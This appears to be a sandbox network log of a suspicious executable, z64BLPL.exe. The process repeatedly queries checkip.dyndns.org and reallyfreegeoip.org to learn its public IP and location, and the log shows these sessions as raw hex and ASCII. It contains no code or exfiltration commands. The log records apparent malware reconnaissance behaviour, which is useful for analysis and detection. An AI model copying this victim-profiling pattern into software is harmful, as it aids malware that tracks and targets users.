                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                        Sep 26, 2024 17:10:35.905626059 CEST745INHTTP/1.1 504 Gateway Time-out
                                                        Date: Thu, 26 Sep 2024 15:10:35 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 557
                                                        Connection: keep-alive
                                                        X-Request-ID: 5becb1b1d69e925157ce1b7151665f46
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                        Sep 26, 2024 17:10:35.914891958 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 26, 2024 17:10:36.537620068 CEST320INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:36 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: 6ade4b43f45e41e5490a246ce552b552
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.449744193.122.6.168807268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 17:10:37.171185017 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 26, 2024 17:10:38.807979107 CEST320INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: a7929405bb8b11a95f0e2445e09cbff5
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449746193.122.6.168807268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 17:10:39.484121084 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 26, 2024 17:10:42.134253025 CEST320INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:42 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: ea9005855a802d4269fa06a83c6685ff
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449748193.122.6.168807268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 17:10:42.941111088 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 26, 2024 17:10:43.617235899 CEST320INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: 7d23390bf25184e6e408f7fa0372a01f
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449750193.122.6.168807268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 17:10:44.334860086 CEST127OUTGET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Sep 26, 2024 17:10:45.045376062 CEST320INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:44 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 103
                                                        Connection: keep-alive
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Request-ID: bf5679f5f4ece92c3e946b2f495bf6c3
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449731188.114.97.34437268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-26 15:10:00 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-26 15:10:00 UTC680INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:00 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 28232
                                                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xvfy2qThdfV1SX9jyqVV%2FzHx6yD%2BvFuiP%2FZa41EOFQwb21WO7p9Fa%2FBCANiP8uMdvz0W5YZrc7ND4OKQxJME33ueUIBOeZvLCAahGBF9gyL4%2FAqi4LZ1IsBPrD8PcWYZhiQTz86B"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c942da379a78ce8-EWR
                                                        2024-09-26 15:10:00 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-26 15:10:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449732188.114.97.34437268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-26 15:10:01 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        2024-09-26 15:10:01 UTC686INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:01 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 28233
                                                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HlnZwIbTz%2FH%2F223Fpesev%2Fqe%2FvjD6UCP3PtjoZ%2FPo6CNitOQqHcNEl0BTJB609BKRtuo2SgatQMwOt0vCCh4NB%2FdAdSs7%2FDXrhOdwK8zj%2BXIWeRC50kkWNobBo4dvRtFvs9tftjE"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c942da90f2c80dc-EWR
                                                        2024-09-26 15:10:01 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-26 15:10:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449741188.114.97.34437268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-26 15:10:31 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-26 15:10:31 UTC682INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:31 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 28263
                                                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HZ1Rvk7gr2kSwFhQzCELoahKJvjhT9pPUSQDRImm%2FSPCnGwaSWomxDBZToEQ%2FQRBNeSyuK7O9in2dd8ljisigFdpfuN2gW2iO1a4BQdfIqKTAqrKTmFjNK%2Fo%2FZ%2BnE0oUn%2FTLcsHo"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c942e6908850f3e-EWR
                                                        2024-09-26 15:10:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-26 15:10:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449743188.114.97.34437268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-26 15:10:37 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-26 15:10:37 UTC680INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:37 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 28269
                                                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ruHl9lAifKFH5tilS%2F0ibisu1xP02zZ6eB8atw0rcwp96Pqu1T%2FgEDlXUgiRMIS%2FQwZpGDJ4OdcI9UvTNicn5BhKHq5MbErWM%2FNKIDzc2HBrlyNo%2BYJhMhuzM6lXNhNA3KlmVhx5"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c942e89d8797291-EWR
                                                        2024-09-26 15:10:37 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-26 15:10:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.449745188.114.97.34437268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-26 15:10:39 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-26 15:10:39 UTC676INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:39 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 28271
                                                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s8QFo8rvPzcJVhDhRxDElhzPz7ybj4nwxDS2It2JSxZKAFGIOSIZjO1kpy7tuFIJrFkdFpzl00wk%2FeQ%2BYy3w6FJKrp3yBiLHwhL0gAbn2RgPPt33KFCdllu%2BKsxL8NzFMkJygJdd"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c942e984820436f-EWR
                                                        2024-09-26 15:10:39 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-26 15:10:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449747188.114.97.34437268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-26 15:10:42 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-26 15:10:42 UTC678INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:42 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        vary: Accept-Encoding
                                                        Cache-Control: max-age=86400
                                                        CF-Cache-Status: HIT
                                                        Age: 28274
                                                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMpsPJjTOCodTtFeeQgcq%2B0yp7RaPlALxgVB3%2FaF9CJeMR%2FkTZN%2FHDfX8ReVrqO74ho8zbKSXwfRZWePnGcST1IQgthN2hjMlnYLDBKUWIB2DKsSBx8QzhtV9WM4ZStyPaMneKJQ"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c942ead5f45c328-EWR
                                                        2024-09-26 15:10:42 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                        2024-09-26 15:10:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449749188.114.97.34437268C:\Users\user\Desktop\z64BLPL.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-26 15:10:44 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                        Host: reallyfreegeoip.org
                                                        Connection: Keep-Alive
                                                        2024-09-26 15:10:44 UTC676INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 15:10:44 GMT
                                                        Content-Type: application/xml
                                                        Transfer-Encoding: chunked
